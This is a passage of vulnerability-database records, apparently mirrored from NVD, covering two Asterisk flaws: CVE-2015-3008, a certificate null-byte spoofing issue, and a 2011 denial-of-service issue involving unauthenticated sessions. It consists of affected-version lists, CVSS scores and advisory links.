              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "F76EA1D5-F5F3-49CE-9A73-20FA03C31F88",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "593ED9E3-D56C-4336-976B-27D30EED658A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "E63726F0-3BC6-49E7-BDE9-71196B480149",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "677AB746-AE4F-46B0-BEE3-82A1FE77271F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "92AC8BBA-6487-449D-A070-2450B1BDE8A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "A5DCA653-B269-4C8C-97DD-92514461B090",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C675C7BA-65E9-4A0A-9A6D-1EBCBEA1D718",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:lts:*:*:*",
              "matchCriteriaId": "BB47EA31-CF9D-4752-804B-7804151EC87C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "066453F2-A77F-4E82-8C91-AC17FAA21A89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0C6CF412-290C-4524-9AFE-D58A85183864",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject\u0027s Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority."
    },
    {
      "lang": "es",
      "value": "Asterisk Open Source 1.8 anterior a 1.8.32.3, 11.x anterior a 11.17.1, 12.x anterior a 12.8.2, y 13.x anterior a 13.3.2 y Certified Asterisk 1.8.28 anterior a 1.8.28-cert5, 11.6 anterior a 11.6-cert11, y 13.1 anterior a 13.1-cert2, cuando registra un dispositivo SIP TLS, no maneja correctamente un byte nulo en un nombre de dominio en el campo Common Name (CN) del sujeto de un certificado X.509, lo que permite a atacantes man-in-the-middle falsificar servidores SSL arbitrarios a trav\u00e9s de un certificado manipulado emitido por una autoridad de certificaci\u00f3n leg\u00edtima."
    }
  ],
  "id": "CVE-2015-3008",
  "lastModified": "2024-11-21T02:28:30.050",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2015-04-10T15:00:10.240",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://advisories.mageia.org/MGASA-2015-0153.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2015-003.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2015/Apr/22"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:206"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/535222/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/74022"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id/1032052"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://advisories.mageia.org/MGASA-2015-0153.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2015-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2015/Apr/22"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:206"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/535222/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/74022"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id/1032052"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-310"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-04-27 00:55

Modified

2024-11-21 01:26

Severity ?

Summary

Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2011-005.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html
cve@mitre.org	http://secunia.com/advisories/44197	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/44529
cve@mitre.org	http://securitytracker.com/id?1025432
cve@mitre.org	http://www.debian.org/security/2011/dsa-2225
cve@mitre.org	http://www.vupen.com/english/advisories/2011/1086	Vendor Advisory
cve@mitre.org	http://www.vupen.com/english/advisories/2011/1107
cve@mitre.org	http://www.vupen.com/english/advisories/2011/1188
cve@mitre.org	https://bugzilla.redhat.com/show_bug.cgi?id=698916	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2011-005.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44197	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/44529
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025432
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2225
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1086	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1107
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/1188
af854a3a-2127-422b-91ae-364da2661108	https://bugzilla.redhat.com/show_bug.cgi?id=698916	Patch

Impacted products

Vendor	Product	Version
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.6
digium	asterisk	c.1.6.1
digium	asterisk	c.1.6.2
digium	asterisk	c.1.8.0
digium	asterisk	c.1.8.1
digium	asterisk	c.2.3
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisk	c.3.6.3
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21
digium	asterisk	1.6.1.22
digium	asterisk	1.6.1.23
digium	asterisk	1.6.1.24

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
